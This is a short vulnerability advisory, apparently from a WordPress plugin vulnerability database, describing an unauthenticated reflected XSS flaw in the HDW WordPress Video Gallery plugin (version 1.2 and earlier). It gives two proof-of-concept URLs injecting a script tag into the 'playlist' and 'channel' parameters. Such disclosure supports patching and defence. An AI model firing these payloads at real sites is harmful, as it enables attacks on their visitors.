WordPress Plugin Vulnerabilities
HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
Proof of Concept
http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><" http://www.example.com/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
ethicalhack3r
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2016-04-12 (about 8 years ago)
Added
2016-04-15 (about 8 years ago)
Last Updated
2020-09-22 (about 3 years ago)